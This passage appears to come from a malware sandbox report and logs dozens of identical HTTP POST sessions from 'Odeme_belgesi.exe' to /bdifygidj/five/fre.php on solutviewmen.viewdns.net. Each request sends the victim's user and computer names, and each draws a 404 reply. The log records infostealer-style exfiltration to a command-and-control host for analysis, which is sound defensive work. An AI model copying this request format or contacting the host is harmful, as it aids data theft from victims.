              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              46192.168.2.44978245.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:50.338696003 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:50.343657017 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:50.990062952 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:23 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              47192.168.2.44978345.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:51.139950991 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:51.144817114 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:51.897425890 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:24 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              48192.168.2.44978445.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:52.151492119 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:52.156455994 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:53.034257889 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:25 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              49192.168.2.44978645.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:53.188088894 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:53.192941904 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:53.833734035 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:26 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              50192.168.2.44978745.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:53.983777046 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:53.988610983 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:54.638890028 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:26 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              51192.168.2.44978845.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:54.952989101 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:54.958719969 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:55.642245054 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:27 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              52192.168.2.44978945.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:55.788645983 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:55.793611050 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:56.438821077 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:28 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              53192.168.2.44979045.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:56.586863041 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:56.591639996 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:57.288909912 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:29 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              54192.168.2.44979145.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:57.447319031 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:57.452107906 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:58.586699009 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:30 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              55192.168.2.44979245.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:58.757473946 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:58.764642000 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:59.517257929 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:31 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              56192.168.2.44979345.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:59.675770998 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:59.680644989 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:00.358503103 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:32 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              57192.168.2.44979445.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:00.508444071 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:00.513320923 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:10.260781050 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:42 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              58192.168.2.44979545.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:10.434482098 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:10.439429045 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:11.179004908 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:43 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              59192.168.2.44979645.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:11.349014997 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:11.353854895 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:12.004467010 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:44 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              60192.168.2.44979745.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:12.177352905 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:12.182284117 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:12.873409033 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:45 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              61192.168.2.44979845.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:13.043592930 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:13.048624039 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:13.732716084 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:45 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              62192.168.2.44979945.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:13.906301022 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:13.911144018 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:14.662214041 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:46 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              63192.168.2.44980045.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:14.808928013 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:14.813721895 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:15.549448013 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:47 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              64192.168.2.44980145.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:15.702488899 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:15.707474947 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:16.583683014 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:48 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              65192.168.2.44980245.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:16.753540993 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:16.758460045 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:17.493792057 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:49 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              66192.168.2.44980345.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:56:17.784352064 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:56:17.789424896 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:56:21.570405960 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:53 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              67192.168.2.44980445.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
